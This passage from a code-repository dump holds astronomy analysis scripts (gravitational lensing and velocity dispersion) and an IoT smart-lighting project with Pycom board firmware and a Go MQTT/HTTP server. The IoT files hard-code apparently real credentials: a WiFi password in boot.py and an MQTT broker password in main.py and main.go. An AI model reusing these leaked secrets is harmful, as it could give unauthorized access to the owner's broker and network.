"avg_line_length": 31.44444465637207, "blob_id": "bb042652a782f225120ad2c9f9b44d9f15f438aa", "content_id": "32cbff1b1d8b26e961a2f4a1fdecbbda53be0a92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1473, "license_type": "no_license", "max_line_length": 130, "num_lines": 45, "path": "/python/modeling_utilities/varyoneoutput.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given a out_optresult.dat file output fom glafic varyone, run glafic in order to plot the variation of the corresponding images.\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\r\n\r\nfilein = str(sys.argv[1]) # glafic input file\nfileout = str(sys.argv[2]) # out_optresult.dat file\nwith open(fileout, 'r') as f:\n out = f.readlines()\n\nlistlens = np.array([])\nlist = np.array([])\ni = 1\nindex = 12 # first line containing the lens parameters in the file\n\n################# this is in case I'm looking for lens properties:\nwhile index + 2 < len(out):\n listlens = np.append(listlens,float(out[index-1].split()[2]))\n index += 16 # the number of lines until the next lens parameters\nprint listlens\n\n################# this is only in case I'm looking for image properties:\nwhile index < 0:\n#while index + 2 < len(out):\n with open(filein, 'r') as f:\n glafic = f.readlines()\n glafic[10 - 1] = \"prefix out%s\" % str(i) + \"\\n\"\n glafic[29 - 1] = out[index-1]\n glafic[30 - 1] = out[index]\n glafic[31 - 1] = out[index+1]\n glafic[32 - 1] = out[index+2]\n glafic[51 - 1] = \"findimg\" + \"\\n\"\n with open(filein, 'w') as f:\n f.writelines(glafic)\n #f.close()\r\n os.system(\"glafic %s\" % filein)\n data = np.loadtxt(\"out%s_point.dat\" % str(i))\n list = np.append(list,data[4][3])\n os.system(\"rm out%s_point.dat\" % str(i))\n index += 16 # the number of lines until the next lens parameters\n i += 1\n\nprint list\r\n\r\n\r\n" }, { "alpha_fraction": 0.526125431060791, "alphanum_fraction": 0.618971049785614, "avg_line_length": 53.08695602416992, "blob_id": "827d6cd89d56141421c74ea29870b81f482f3f4b", "content_id": "fbfc68a381540beade6f68619047bf5e78621e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 555, "num_lines": 46, "path": "/python/catalogue_utilities/veldispsamplesfromMstar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Calculates the pdf for the velocity dispersion of each galaxy. Check Jabran Zahid et al 2016 for the applicability of the formulas. The input is a file that contains 100 (z,Mstar) pairs for each galaxy, on each line, and is produced by mstarsampling_nobeta_forveldisperr.py\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\n\n####################\n# Jabran Zahid et al 2017 parameters:\nsb = 10**(2.07)\nMb = 10**(10.26)\na1 = 0.403\na2 = 0.293\n#veldisperr = lambda x: 0.001*(0.1 * x + 14) # [km/s]; eyeballed from Fig. 9(a)\nveldisperr = lambda x: 0.1 * x + 14 # [km/s]; eyeballed from Fig. 9(a)\n\n####################\nlens = SkyCoord('20:33:42.16 -47:23:44.20', frame='fk5', unit=(u.hourangle, u.deg)) # center of the lensing galaxy\n\n# read from file\nra = 2\ndec = 3\nimag = 4\nclassify = 7\nz0 = 8\nmstar0 = 9\n\nfile = \"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_forveldisperr.cat\"\ndata = np.loadtxt(file)\ndata = data[(data[:,imag]<=23) & (data[:,classify]>=0)] # only i <= 23 galaxies\nveldisp = np.zeros([np.shape(data)[0],100])\n\nfor i in range(np.shape(data)[0]):\n mstar = data[i][mstar0:208:2]\n #mstar = mstar - np.log10(0.55) # not converting to Salpeter IMF, because me and Zahid et al 2016 calculated masses with Chabrier\n coord = SkyCoord(ra=data[i][ra]*u.degree, dec=data[i][dec]*u.degree, frame='fk5')\n sep = coord.separation(lens).arcsec\n z = data[i][z0:207:2] # in the current code, it is not used for anything\n veldisp[i][10**mstar < Mb] = np.abs(np.random.normal(sb * ((10**mstar[10**mstar < Mb] / Mb)**a1),veldisperr((10**mstar[10**mstar < Mb] / Mb)**a1)))\n veldisp[i][10**mstar >= Mb] = np.abs(np.random.normal(sb * ((10**mstar[10**mstar >= Mb] / Mb)**a2),veldisperr(10**mstar[10**mstar >= Mb] / Mb)**a2))\n\nnp.savetxt(file[:-4] + \"_veldisppdf.cat\",veldisp,fmt='%.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f %.2f')\n" }, { "alpha_fraction": 0.5153429508209229, "alphanum_fraction": 0.5622743964195251, "avg_line_length": 21.08333396911621, "blob_id": "0b9d03e0b68669287173520992e14b64bf83cc01", "content_id": "ba22b94ad213b331289d4500467a470896e795bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1108, "license_type": "no_license", "max_line_length": 110, "num_lines": 48, "path": "/python/catalogue_utilities/readKappaBinary.c", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#include <stdio.h>\r\n#include <stdlib.h>\r\n\r\nint main (int argc, char** argv) {\r\n \r\n FILE *fpt;\r\n float* kappa;\r\n \r\n const size_t number_of_elements = 4096 * 4096;\r\n const size_t size_of_elements = sizeof(float);\r\n const char kappa_file_name[] = \"kappa_maps_z_1.3857/GGL_los_8_0_0_N_4096_ang_4_rays_to_plane_37_f.kappa\";\r\n \r\n kappa = calloc(number_of_elements, size_of_elements);\r\n \r\n if (!kappa)\r\n {\r\n fprintf(stderr, \"Cannot allocate memory for kappa array\\n\");\r\n exit(-1);\r\n }\r\n\r\n //fprintf(stdout, \"%s\\n\", kappa_file_name);\r\n\t \r\n fpt = fopen (kappa_file_name, \"r\");\r\n \r\n if (!fpt)\r\n {\r\n fprintf(stderr, \"Cannot open kappa file\\n\");\r\n exit(-1);\r\n }\r\n\t \r\n fread(kappa, size_of_elements, number_of_elements, fpt);\r\n fclose (fpt);\r\n\r\n\r\n fpt = fopen (\"kappa_values.dat\", \"w\");\r\n int i;\r\n for (i=0; i<number_of_elements; i++)\r\n {\r\n fprintf(fpt, \"%d\\t%lf\\n\", i, kappa[i]);\r\n }\r\n fclose(fpt);\r\n\r\n fprintf(stdout, \"test kappa value:\\n %f %f %f\\n\", kappa[0], kappa[1000+2000*4096], kappa[4095+4095*4096]);\r\n\r\n free(kappa);\r\n return 0;\r\n \r\n}\r\n" } ]
214
Thebp/SE-IOT
https://github.com/Thebp/SE-IOT
d01b9b427d289cedfc1ebdd45de53af809f655f9
a5ae2c2ff3989c1f116bf3a1c00a4d1119609441
7dd6d28aea684568b47c11f1f00374eb65ae7a05
refs/heads/master
2020-04-28T10:39:04.682524
2019-05-30T20:42:17
2019-05-30T20:42:17
175,209,781
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6150442361831665, "alphanum_fraction": 0.6371681690216064, "avg_line_length": 23.25, "blob_id": "3818f404f1500a279ee71a3cb37f0535a1b1fec7", "content_id": "f03a4e1bd7ddf6da632c75e11928628eca2188c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 678, "license_type": "no_license", "max_line_length": 59, "num_lines": 28, "path": "/IOT-Project/client/boot.py", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "from network import WLAN\nimport machine\nimport pycom\nimport time\n\npycom.heartbeat(False)\nwlan = WLAN(mode=WLAN.STA)\nwlan.disconnect()\n\nssid = \"Oneplus 6\"\npassword = \"csgg1469\"\n\naccess_points = wlan.scan()\nfor ap in access_points:\n if ap.ssid == ssid:\n print('Network found!')\n wlan.connect(ap.ssid, auth=(ap.sec, password))\n while not wlan.isconnected():\n machine.idle() # save power while waiting\n \n print('WLAN connection succeeded!')\n # 5 second blue flash to show successful connection\n pycom.rgbled(0x0000FF)\n time.sleep(5)\n pycom.rgbled(0x000000)\n\n machine.main('main.py')\n break" }, { "alpha_fraction": 0.6769438982009888, "alphanum_fraction": 0.6842461228370667, "avg_line_length": 22.701923370361328, "blob_id": "f0c414fdf314b35ac7c8b8805e2f9d25cd4c24a0", "content_id": "302f959689a14926f574bbf5a85b4935244ee88e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 7395, "license_type": "no_license", "max_line_length": 134, "num_lines": 312, "path": "/IOT-Project/go-server/server.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"encoding/json\"\n\t\"fmt\"\n\t\"net/http\"\n\t\"time\"\n\n\tmqtt \"github.com/eclipse/paho.mqtt.golang\"\n\t\"github.com/gorilla/mux\"\n)\n\ntype server struct {\n\tdatabase Database\n\tmqtt mqtt.Client\n}\n\ntype Database interface {\n\tGetRoom(id string) (room Room, err error)\n\tGetRooms() ([]Room, error)\n\tGetBoard(id string) (board Board, err error)\n\tInsertRoom(room Room) (Room, error)\n\tUpdateRoom(room Room) error\n\tGetBoardsByRoom(roomId string) ([]Board, error)\n\tGetUnassignedBoards() ([]Board, error)\n\tInsertBoard(board Board) error\n\tUpdateBoard(board Board) error\n\tInsertLightData(data LightData) error\n\tGetLatestLightData(roomID string) ([]LightData, error)\n}\n\nfunc NewServer(database Database, mqtt mqtt.Client) *server {\n\tif token := mqtt.Connect(); token.Wait() && token.Error() != nil {\n\t\tpanic(token.Error())\n\t}\n\treturn &server{database, mqtt}\n\n}\n\nfunc (s *server) run() {\n\ts.mqtt.Subscribe(\"board_discovery\", 0, s.boardDiscovery)\n\ts.mqtt.Subscribe(\"lightdata\", 0, s.processLightData)\n\n\tr := mux.NewRouter()\n\tr.Methods(\"OPTIONS\").HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\t\tw.Header().Set(\"Access-Control-Allow-Methods\", \"POST, GET, OPTIONS, PUT, DELETE\")\n\t\tw.Header().Set(\"Access-Control-Allow-Headers\", \"Accept, Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization\")\n\t})\n\n\tr.HandleFunc(\"/boards/{boardId}/ping\", s.pingBoard).Methods(\"POST\")\n\tr.HandleFunc(\"/rooms\", s.getRooms).Methods(\"GET\")\n\tr.HandleFunc(\"/rooms\", s.postRoom).Methods(\"POST\")\n\tr.HandleFunc(\"/rooms/{roomId}\", s.putRoom).Methods(\"PUT\")\n\tr.HandleFunc(\"/rooms/{roomId}/boards\", s.getBoardsByRoom).Methods(\"GET\")\n\tr.HandleFunc(\"/unassigned_boards\", s.getUnassignedBoards).Methods(\"GET\")\n\tr.HandleFunc(\"/boards/{boardId}\", s.putBoard).Methods(\"PUT\")\n\n\t_, err := s.database.InsertRoom(Room{Name: \"Default room\"})\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tfmt.Println(\"Listening...\")\n\thttp.ListenAndServe(\":50002\", r)\n}\n\nfunc (s *server) updateRoomLight(roomID string) {\n\troom, err := s.database.GetRoom(roomID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tintensity := room.LedConfig.Intensity\n\n\tif room.LedConfig.DaylightHarvesting {\n\t\tlightdata, err := s.database.GetLatestLightData(roomID)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn\n\t\t}\n\n\t\tlightlevel := getAverageLightlevel(lightdata)\n\t\tintensity = getIntensityFromLightlevel(lightlevel)\n\t}\n\n\tboards, err := s.database.GetBoardsByRoom(roomID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tcolor := room.LedConfig.Color\n\tcolor.Red = int(float32(color.Red) / 100.0 * float32(intensity))\n\tcolor.Green = int(float32(color.Green) / 100.0 * float32(intensity))\n\tcolor.Blue = int(float32(color.Blue) / 100.0 * float32(intensity))\n\n\tcolor_json, err := json.Marshal(color)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfor _, board := range boards {\n\t\ts.sendMessage(fmt.Sprintf(\"%v/led/rgb\", board.ID), color_json)\n\t}\n\n}\n\nfunc (s *server) boardDiscovery(client mqtt.Client, msg mqtt.Message) {\n\tvar board Board\n\tif err := json.Unmarshal(msg.Payload(), &board); err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tb, err := s.database.GetBoard(board.ID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\tif b.ID == \"\" {\n\t\tboard.RoomID = \"0\"\n\t\terr = s.database.InsertBoard(board)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t}\n\t\tfmt.Printf(\"New board discovered: %v\\n\", board.ID)\n\t}\n}\n\nfunc (s *server) processLightData(client mqtt.Client, msg mqtt.Message) {\n\tvar lightData LightData\n\tif err := json.Unmarshal(msg.Payload(), &lightData); err != nil {\n\t\tpanic(err)\n\t}\n\tif lightData.BoardID == \"\" {\n\t\tfmt.Println(\"No BoardID on lightdata\")\n\t\treturn\n\t}\n\tlightData.Time = time.Now()\n\terr := s.database.InsertLightData(lightData)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tboard, err := s.database.GetBoard(lightData.BoardID)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tgo s.updateRoomLight(board.RoomID)\n}\n\nfunc (s *server) sendMessage(topic string, payload interface{}) {\n\ttoken := s.mqtt.Publish(topic, 0, false, payload)\n\ttoken.Wait()\n}\n\nfunc (s *server) pingBoard(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\tboardId := vars[\"boardId\"]\n\n\tboard, err := s.database.GetBoard(boardId)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif board.ID != \"\" {\n\t\ts.sendMessage(fmt.Sprintf(\"%v/led/ping\", board.ID), `{\"ping\":\"ping\"}`)\n\t}\n\tw.WriteHeader(200)\n}\n\nfunc (s *server) getRooms(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\trooms, err := s.database.GetRooms()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\trooms_json, err := json.Marshal(rooms)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n\n\tw.Write(rooms_json)\n}\n\nfunc (s *server) getBoardsByRoom(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\troomId := vars[\"roomId\"]\n\n\tboards, err := s.database.GetBoardsByRoom(roomId)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tboards_json, err := json.Marshal(boards)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n\n\tw.Write(boards_json)\n}\n\nfunc (s *server) getUnassignedBoards(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tboards, err := s.database.GetUnassignedBoards()\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tboards_json, err := json.Marshal(boards)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\tw.WriteHeader(500)\n\t\treturn\n\t}\n\n\tw.Write(boards_json)\n}\n\nfunc (s *server) putBoard(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\tboardId := vars[\"boardId\"]\n\n\tvar board Board\n\terr := json.NewDecoder(r.Body).Decode(&board)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Request body is invalid format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif board.ID != boardId {\n\t\thttp.Error(w, \"Board ID in request body is different from ID in URL\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr = s.database.UpdateBoard(board)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Something went wrong\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tgo s.updateRoomLight(board.RoomID)\n\n\tw.WriteHeader(200)\n}\n\nfunc (s *server) postRoom(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvar room Room\n\terr := json.NewDecoder(r.Body).Decode(&room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Request body is invalid format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\troom, err = s.database.InsertRoom(room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Something went wrong\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tw.WriteHeader(200)\n}\n\nfunc (s *server) putRoom(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Set(\"Access-Control-Allow-Origin\", \"*\")\n\n\tvars := mux.Vars(r)\n\troomId := vars[\"roomId\"]\n\n\tvar room Room\n\terr := json.NewDecoder(r.Body).Decode(&room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Request body is invalid format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif room.ID != roomId {\n\t\thttp.Error(w, \"Room ID in request body is different from ID in URL\", http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr = s.database.UpdateRoom(room)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\thttp.Error(w, \"Something went wrong\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tgo s.updateRoomLight(room.ID)\n\n\tw.WriteHeader(200)\n}\n" }, { "alpha_fraction": 0.5363790392875671, "alphanum_fraction": 0.5972927212715149, "avg_line_length": 20.925926208496094, "blob_id": "a5ed8a831ac3658c8a129c6b7cab54b50a413dd7", "content_id": "2f36c8797c066a589a2ebb258da36cd512a50668", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 63, "num_lines": 27, "path": "/IOT-Project/client/components.py", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "from lib.LTR329ALS01 import LTR329ALS01\nimport pycom\nimport time\n\nclass Led:\n def __init__(self):\n pycom.heartbeat(False)\n self.value = 0x000000\n pycom.rgbled(self.value)\n\n def set_rgb(self, red, green, blue):\n self.value = int('0x%02x%02x%02x' % (red, green, blue))\n pycom.rgbled(self.value)\n \n def ping(self):\n pycom.rgbled(0x00FF00)\n time.sleep(2)\n pycom.rgbled(self.value)\n\n\n\nclass Lightsensor:\n def __init__(self):\n self.lt = LTR329ALS01()\n \n def get_lightlevel(self):\n return self.lt.light()[0]" }, { "alpha_fraction": 0.7216494679450989, "alphanum_fraction": 0.7319587469100952, "avg_line_length": 31.33333396911621, "blob_id": "c04d25e7b1e4a988cea5c6c74686f394f8e60b62", "content_id": "923f932b9e01f2a21ce00325139622fa3e770077", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 97, "license_type": "no_license", "max_line_length": 42, "num_lines": 3, "path": "/IOT-Project/go-server/deploy.sh", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "env GOOS=linux GOARCH=arm GOARM=5 go build\nscp go-server mndkk.dk:\nssh -t mndkk.dk './go-server'\n" }, { "alpha_fraction": 0.6183643937110901, "alphanum_fraction": 0.6183643937110901, "avg_line_length": 20.121212005615234, "blob_id": "71e713d829d3bb7ee5c57a3e89e45a69cf45f462", "content_id": "793db383ac5527cf8f5f0aeb0b538dfd0610d840", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 697, "license_type": "no_license", "max_line_length": 56, "num_lines": 33, "path": "/IOT-Project/go-server/models.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nimport \"time\"\n\ntype Board struct {\n\tID string `json:\"id\"`\n\tRoomID string `json:\"room_id\"`\n}\n\ntype Room struct {\n\tID string `json:\"id\"`\n\tName string `json:\"name\"`\n\tLedConfig LedConfig `json:\"led_config\"`\n\tBoards []Board `json:\"boards\"`\n}\n\ntype LedConfig struct {\n\tIntensity int `json:\"intensity\"`\n\tColor RGBData `json:\"color\"`\n\tDaylightHarvesting bool `json:\"daylight_harvesting\"`\n}\n\ntype LightData struct {\n\tLightLevel int `json:\"lightlevel\"`\n\tBoardID string `json:\"board_id\"`\n\tTime time.Time `json:\"time\"`\n}\n\ntype RGBData struct {\n\tRed int `json:\"red\"`\n\tGreen int `json:\"green\"`\n\tBlue int `json:\"blue\"`\n}\n" }, { "alpha_fraction": 0.6060929894447327, "alphanum_fraction": 0.6103687882423401, "avg_line_length": 31.842105865478516, "blob_id": "110a124b47893fa589867e9ad5b74eb81f670eae", "content_id": "27e026698d17cecdb71f5e79e51c8000aab55990", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1871, "license_type": "no_license", "max_line_length": 130, "num_lines": 57, "path": "/IOT-Project/client/main.py", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "import machine\nimport time\nimport ujson\nfrom components import Led, Lightsensor\nfrom mqtt import MQTTClient\nfrom machine import Timer\nimport ubinascii\n\nMQTT_HOST = \"mndkk.dk\"\nMQTT_USER = \"iot\"\nMQTT_PASSWORD = \"uS831ACCL6sZHz4\"\nMQTT_PORT = 1883\n\nclass Board:\n def __init__(self):\n self.id = ubinascii.hexlify(machine.unique_id()).decode(\"utf-8\") \n print(\"machine id: {}\".format(self.id))\n self.mqtt = MQTTClient(self.id, MQTT_HOST, MQTT_PORT, MQTT_USER, MQTT_PASSWORD)\n self.led = Led()\n self.lightsensor = Lightsensor()\n\n self.dispatcher = {}\n self.dispatcher[\"{}/led/rgb\".format(self.id)] = lambda rgb: self.led.set_rgb(rgb[\"red\"], rgb[\"green\"], rgb[\"blue\"])\n self.dispatcher[\"{}/led/ping\".format(self.id)] = lambda msg: self.led.ping()\n\n def process_message(self, topic, msg):\n topic_str = topic.decode(\"utf-8\")\n msg_str = msg.decode(\"utf-8\")\n if topic_str in self.dispatcher:\n self.dispatcher[topic_str](ujson.loads(msg_str))\n\n def publish_lightlevel(self, alarm):\n self.mqtt.publish(topic=\"lightdata\", msg=ujson.dumps({\"lightlevel\":self.lightsensor.get_lightlevel(),\"board_id\":self.id}))\n\n def run(self):\n self.mqtt.set_callback(self.process_message)\n self.mqtt.connect()\n\n self.mqtt.subscribe(\"{}/led/rgb\".format(self.id))\n self.mqtt.subscribe(\"{}/led/ping\".format(self.id))\n\n self.mqtt.publish(topic=\"board_discovery\", msg=ujson.dumps({\"id\":self.id}))\n\n alarms = []\n alarms.append(Timer.Alarm(handler=self.publish_lightlevel, s=5, periodic=True))\n\n try:\n while True:\n self.mqtt.wait_msg()\n machine.idle()\n finally:\n for alarm in alarms:\n alarm.cancel()\n self.mqtt.disconnect()\n\nif __name__ == \"__main__\":\n Board().run()" }, { "alpha_fraction": 0.6722689270973206, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 17.789474487304688, "blob_id": "58aa6ab0c303a4ffd143f5f891d18ef5aa234f02", "content_id": "f4cc93302b67b6816804e11e1f8b10c8e985d148", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 357, "license_type": "no_license", "max_line_length": 54, "num_lines": 19, "path": "/IOT-Project/go-server/helpers.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nfunc getAverageLightlevel(lightdata []LightData) int {\n\tif len(lightdata) == 0 {\n\t\treturn 0\n\t}\n\ttotal := 0\n\tfor _, lightdatum := range lightdata {\n\t\ttotal += lightdatum.LightLevel\n\t}\n\treturn total / len(lightdata)\n}\n\nfunc getIntensityFromLightlevel(lightlevel int) int {\n\tif lightlevel > 100 {\n\t\tlightlevel = 100\n\t}\n\treturn 100 - lightlevel\n}\n" }, { "alpha_fraction": 0.6755540370941162, "alphanum_fraction": 0.679016649723053, "avg_line_length": 22.104000091552734, "blob_id": "4d093c9f0da1a30fa45dcea309d7f9e04434225b", "content_id": "cd196e3082af3337deddf90fc180f646513909c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2888, "license_type": "no_license", "max_line_length": 101, "num_lines": 125, "path": "/IOT-Project/go-server/main.go", "repo_name": "Thebp/SE-IOT", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"strconv\"\n\n\tmqtt \"github.com/eclipse/paho.mqtt.golang\"\n)\n\ntype inMemoryDatabase struct {\n\tboards map[string]Board\n\trooms map[string]Room\n\tlightData []LightData\n\troomCounter int\n}\n\nfunc (d *inMemoryDatabase) InsertRoom(room Room) (Room, error) {\n\troom.ID = strconv.Itoa(d.roomCounter)\n\td.rooms[room.ID] = room\n\td.roomCounter++\n\treturn room, nil\n}\n\nfunc (d *inMemoryDatabase) UpdateRoom(room Room) error {\n\tif _, ok := d.rooms[room.ID]; ok {\n\t\td.rooms[room.ID] = room\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"No room with ID %v\", room.ID)\n}\n\nfunc (d *inMemoryDatabase) GetRoom(id string) (Room, error) {\n\tif room, ok := d.rooms[id]; ok {\n\t\treturn room, nil\n\t}\n\treturn Room{}, nil\n}\n\nfunc (d *inMemoryDatabase) GetRooms() ([]Room, error) {\n\trooms := make([]Room, 0, len(d.rooms))\n\tfor _, room := range d.rooms {\n\t\tboards, _ := d.GetBoardsByRoom(room.ID)\n\t\troom.Boards = boards\n\t\trooms = append(rooms, room)\n\t}\n\treturn rooms, nil\n}\n\nfunc (d *inMemoryDatabase) GetBoardsByRoom(roomId string) ([]Board, error) {\n\tboards := make([]Board, 0)\n\tfor _, board := range d.boards {\n\t\tif board.RoomID == roomId {\n\t\t\tboards = append(boards, board)\n\t\t}\n\t}\n\treturn boards, nil\n}\n\nfunc (d *inMemoryDatabase) GetUnassignedBoards() ([]Board, error) {\n\tboards := make([]Board, 0)\n\tfor _, board := range d.boards {\n\t\tif board.RoomID == \"\" {\n\t\t\tboards = append(boards, board)\n\t\t}\n\t}\n\treturn boards, nil\n}\n\nfunc (d *inMemoryDatabase) GetBoard(id string) (Board, error) {\n\tif board, ok := d.boards[id]; ok {\n\t\treturn board, nil\n\t}\n\treturn Board{}, nil\n}\n\nfunc (d *inMemoryDatabase) UpdateBoard(board Board) error {\n\tif _, ok := d.boards[board.ID]; ok {\n\t\td.boards[board.ID] = board\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"No board with ID %v\", board.ID)\n}\n\nfunc (d *inMemoryDatabase) InsertBoard(board Board) error {\n\td.boards[board.ID] = board\n\treturn nil\n}\n\nfunc (d *inMemoryDatabase) InsertLightData(lightData LightData) error {\n\td.lightData = append(d.lightData, lightData)\n\treturn nil\n}\n\nfunc (d *inMemoryDatabase) GetLatestLightData(roomID string) ([]LightData, error) {\n\tlightdata := make([]LightData, 0)\n\tboards, _ := d.GetBoardsByRoom(roomID)\n\tfor _, board := range boards {\n\t\tlightdata = append(lightdata, d.getLatestLightData(board.ID))\n\t}\n\treturn lightdata, nil\n}\n\nfunc (d *inMemoryDatabase) getLatestLightData(boardID string) LightData {\n\tlatest := LightData{}\n\tfor _, lightdata := range d.lightData {\n\t\tif lightdata.Time.Unix() > latest.Time.Unix() {\n\t\t\tlatest = lightdata\n\t\t}\n\t}\n\treturn latest\n}\n\nfunc main() {\n\topts := mqtt.NewClientOptions()\n\topts.AddBroker(\"mndkk.dk:1883\")\n\topts.SetClientID(\"server\")\n\topts.SetUsername(\"iot\")\n\topts.SetPassword(\"uS831ACCL6sZHz4\")\n\n\tmqtt_client := mqtt.NewClient(opts)\n\tdatabase := inMemoryDatabase{make(map[string]Board), make(map[string]Room), make([]LightData, 0), 0}\n\n\tserver := NewServer(&database, mqtt_client)\n\tserver.run()\n}\n" } ]
8
ahlqldntm8/Parking-Calculator
https://github.com/ahlqldntm8/Parking-Calculator
767836aeb73027bee4dacc0d083718614a07154c
49035f5303127f317a14e192c3054f22494e0a93
87d67f04678f4dbbf651d99785ac0a6ca54e3d6f
refs/heads/main
2023-08-07T23:49:26.067059
2021-09-28T04:18:24
2021-09-28T04:18:24
338,941,753
0
0
null
null
null
null
null
